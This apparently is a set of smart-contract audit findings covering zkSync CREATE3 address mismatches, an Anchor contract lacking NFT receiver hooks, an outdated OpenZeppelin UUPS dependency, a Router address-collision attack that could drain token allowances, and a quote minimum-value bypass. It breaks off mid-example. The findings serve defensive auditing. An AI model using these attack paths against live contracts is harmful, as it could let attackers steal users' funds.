The zkSync Era docs explain how it differs from Ethereum.\\nPOC:\\n```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport "./MiniContract.sol";\\nimport "./CREATE3.sol";\\n\\ncontract DeployTest {\\n    address public deployedAddress;\\n    event Deployed(address);\\n    \\n    function generateContract() public returns(address, address) {\\n        bytes32 salt = keccak256("SALT");\\n\\n        address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n        // check if the contract has already been deployed by checking code size of address\\n        bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n        // Use CREATE3 to deploy the anchor contract\\n        address deployed = CREATE3.deploy(salt, creationCode, 0);\\n        return (preCalculatedAddress, deployed);\\n    }\\n}\\n```\\n\\nAlso, the logic to compute the CREATE2 address is different from Ethereum, as shown below, so the CREATE3 library cannot be used as is.\\nThis causes the registry to return an incorrect `preCalculatedAddress`, so the anchor is registered at an address that is not the actual deployed address.\\n```\\naddress ⇒ keccak256( \\n    keccak256("zksyncCreate2") ⇒ 0x2020dba91b30cc0006188af794c2fb30dd8520db7e2c088b7fc7c103c00ca494, \\n    sender, \\n    salt, \\n    keccak256(bytecode), \\n    keccak256(constructorInput)\\n    ) \\n```\\n
This can be solved by implementing CREATE2 directly instead of CREATE3 and using `type(Anchor).creationCode`. Also, the compute address logic needs to be modified for zkSync.
`generateAnchor` doesn't work, so users can't do anything related to anchors.
```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport "./MiniContract.sol";\\nimport "./CREATE3.sol";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256("SALT");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n
Anchor contract is unable to receive NFTs of any kind
medium
Anchor.sol essentially works like a wallet, and is also attached to a profile to give it extra credibility and the profile owner more functionality.\\nAs intended, this contract will receive NFTs from different strategies and protocols. However, as currently implemented, these contracts will not be able to receive NFTs sent with safeTransferFrom(), because they do not implement the necessary functions to safely receive these tokens.\\nWhile in many cases such a situation would be Medium severity, considering how these wallets will be used, it could lead to more serious consequences. For example, having an anchor that is entitled to high-value NFTs but is not able to receive them is clearly a loss of funds risk, and a High severity issue.\\nImplement the onERC721Received() and onERC1155Received() functions in the following code:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from "./Registry.sol";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// 
⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc <aditya@gitcoin.co>, @0xKurt <kurt@gitcoin.co>, @codenamejason <jason@gitcoin.co>, @0xZakk <zakk@gitcoin.co>, @nfrgosselin <nate@gitcoin.co>\\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 
_profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n
Implement the onERC721Received() and onERC1155Received() functions in the Anchor contract.
Any time an ERC721 or ERC1155 token is transferred to the Anchor contract with safeTransferFrom() or minted to it with safeMint(), the call will fail.
```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from "./Registry.sol";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc <aditya@gitcoin.co>, @0xKurt <kurt@gitcoin.co>, @codenamejason <jason@gitcoin.co>, @0xZakk <zakk@gitcoin.co>, @nfrgosselin <nate@gitcoin.co>\\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. 
This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert 
UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n
UUPSUpgradeable vulnerability in OpenZeppelin Contracts
medium
OpenZeppelin has found a critical severity bug in UUPSUpgradeable. The kyber-swap contracts use both the OpenZeppelin contracts and the OpenZeppelin upgradeable contracts at version 4.3.1. This is confirmed from package.json.\\n```\\nFile: ks-elastic-sc/package.json\\n\\n "@openzeppelin/contracts": "4.3.1",\\n "@openzeppelin/test-helpers": "0.5.6",\\n "@openzeppelin/contracts-upgradeable": "4.3.1",\\n```\\n\\nThe `UUPSUpgradeable` vulnerability affects the following OpenZeppelin versions:\\n@openzeppelin/contracts : >= 4.1.0 < 4.3.2\\n@openzeppelin/contracts-upgradeable : >= 4.1.0 < 4.3.2\\nOpenZeppelin has fixed this issue in version 4.3.2.\\nOpenZeppelin bug acceptance and fix: check here\\nThe following contracts have been affected by this vulnerability:\\nPoolOracle.sol\\nTokenPositionDescriptor.sol\\nBoth of these contracts are UUPSUpgradeable and the issue must be fixed.
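For reference, the affected range stated in the advisory can be checked mechanically. The sketch below is illustrative Python (not part of the codebase); the version strings and range bounds are taken from the advisory quoted above:

```python
def parse(version):
    # "4.3.1" -> (4, 3, 1), so versions compare lexicographically
    return tuple(int(part) for part in version.split("."))

def is_affected(version, lo="4.1.0", hi="4.3.2"):
    # affected range from the advisory: >= 4.1.0, < 4.3.2
    return parse(lo) <= parse(version) < parse(hi)

print(is_affected("4.3.1"))  # pinned version in package.json -> True
print(is_affected("4.3.2"))  # first patched release -> False
```

This confirms that the pinned 4.3.1 falls inside the vulnerable range while the 4.3.2 fix does not.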
Update the OpenZeppelin libraries to the latest version.\\nCheck the OpenZeppelin security advisory on how to initialize the UUPS implementation contracts.\\nCheck the OpenZeppelin UUPS documentation.
Upgradeable contracts using UUPSUpgradeable may be vulnerable to an attack affecting uninitialized implementation contracts.
```\\nFile: ks-elastic-sc/package.json\\n\\n "@openzeppelin/contracts": "4.3.1",\\n "@openzeppelin/test-helpers": "0.5.6",\\n "@openzeppelin/contracts-upgradeable": "4.3.1",\\n```\\n
Router.sol is vulnerable to address collission
medium
The pool address check in the callback function isn't strict enough and can suffer issues with collision. Due to the truncated nature of the create2 opcode, the collision resistance is already impaired to 2^160, as that is the total number of possible hashes after truncation. Obviously if you are searching for a single hash, this is (basically) impossible. The issue here is that one does not need to search for a single address, as the router never verifies that the pool actually exists. This is the crux of the problem, but first let's do a little math as to why this is a problem.\\n$$ 1 - e ^ {-k(k-1) \\over 2N } $$\\nWhere k is the number of hash values and N is the number of possible hashes.\\nFor very large numbers we can further approximate the exponent to:\\n$$ -k^2 \\over 2N $$\\nThis exponent is now trivial to solve for an approximate attack value, which is:\\n$$ k = \\sqrt{2N} $$\\nIn our scenario N is 2^160 (our truncated keccak256), which means that our approximate attack value is 2^80, since we need to generate two sets of hashes. The first set is to generate 2^80 public addresses and the second is to generate pool addresses from variations in the pool specifics (token0, token1, fee). Here we reach a final attack value of 2^81 hashes. Using the provided calculator, we see that 2^81 hashes have an approximate 86.4% chance of a collision. Increase that number to 2^82 and the odds of collision become 99.96%. In this case, a collision between addresses means breaking this check and draining the allowances of all users to a specific token. This is because the EOA address will collide with the supposed pool address, allowing it to bypass the msg.sender check.
Now let's consider the specifics of the contract.\\nRouter.sol#L47-L51\\n```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n\\nThe above snippet from the swapCallback function is used to verify that msg.sender is the address of the pool.\\nRouter.sol#L224-L231\\n```\\nfunction _getPool(\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n) private view returns (IPool) {\\n return IPool(PoolAddress.computeAddress(factory, tokenA, tokenB, fee, poolInitHash));\\n}\\n```\\n\\nWe see that these lines never check with the factory that the pool exists, or that any of the inputs are valid in any way. token0 can be constant and we can achieve the variation in the hash by changing token1. The attacker could use token0 = WETH and vary token1. This would allow them to steal all allowances of WETH. Since allowances are forever until revoked, this could put hundreds of millions of dollars at risk.\\nAlthough this would require a large amount of compute, it is already possible to break with current computing power. Given the enormity of the value potentially at stake, it would be a lucrative attack to anyone who could fund it. In less than a decade this would likely be a fairly easily attained amount of compute, nearly guaranteeing this attack.
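The collision figures quoted above follow directly from the birthday-bound approximation. The sketch below is illustrative Python reproducing that formula, not part of the audited code:

```python
import math

def collision_probability(k_bits, n_bits):
    # birthday-bound approximation: p ~ 1 - exp(-k^2 / (2N)),
    # with k = 2^k_bits hashes over a space of N = 2^n_bits values
    exponent = (2.0 ** (2 * k_bits)) / (2.0 ** (n_bits + 1))
    return 1.0 - math.exp(-exponent)

# 2^81 total hashes against the 2^160 truncated-address space
print(round(collision_probability(81, 160), 4))  # 0.8647
# 2^82 total hashes
print(round(collision_probability(82, 160), 4))  # 0.9997
```

For k = 2^81 and N = 2^160 the exponent works out to exactly 2, so the probability is 1 - e^-2 ≈ 86.5%, matching the figure in the finding.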
Verify with the factory that msg.sender is a valid pool
Address collision can cause all allowances to be drained
```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n
Position value can fall below minimum acceptable quote value when partially closing positions requested to be closed in full
medium
In `LibQuote.closeQuote` there is a requirement that the remaining quote value not be less than minAcceptableQuoteValue:\\n```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n "LibQuote: Remaining quote value is low");\\n}\\n```\\n\\nNotice the condition under which this require happens:\\n`LibQuote.quoteOpenAmount(quote)` is the remaining open amount\\n`quote.quantityToClose` is the requested amount to close\\nThis means that this check is ignored if partyA has requested to close an amount equal to the full remaining quote value, but enforced when it's not (even if closing fully). For example, a quote with opened amount = 100 is requested to be closed in full (amount = 100): this check is ignored. But PartyB can fill the request partially, for example fill 99 out of 100, and the remainder (1) is not checked to conform to `minAcceptableQuoteValue`.\\nThe following execution paths are possible if PartyA has open position size = 100 and `minAcceptableQuoteValue` = 5:\\n`requestToClosePosition(99)` -> revert\\n`requestToClosePosition(100)` -> `fillCloseRequest(99)` -> pass (remaining quote = 1)
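The two execution paths can be illustrated with a simplified model. This is illustrative Python, not the actual contract logic; the minAcceptableQuoteValue of 5 and the position size of 100 are taken from the example above:

```python
MIN_QUOTE_VALUE = 5  # minAcceptableQuoteValue from the example

def close_allowed(open_amount, quantity_to_close, filled_amount):
    # the remaining-value check only runs when the requested close
    # amount differs from the full remaining open amount
    if open_amount != quantity_to_close:
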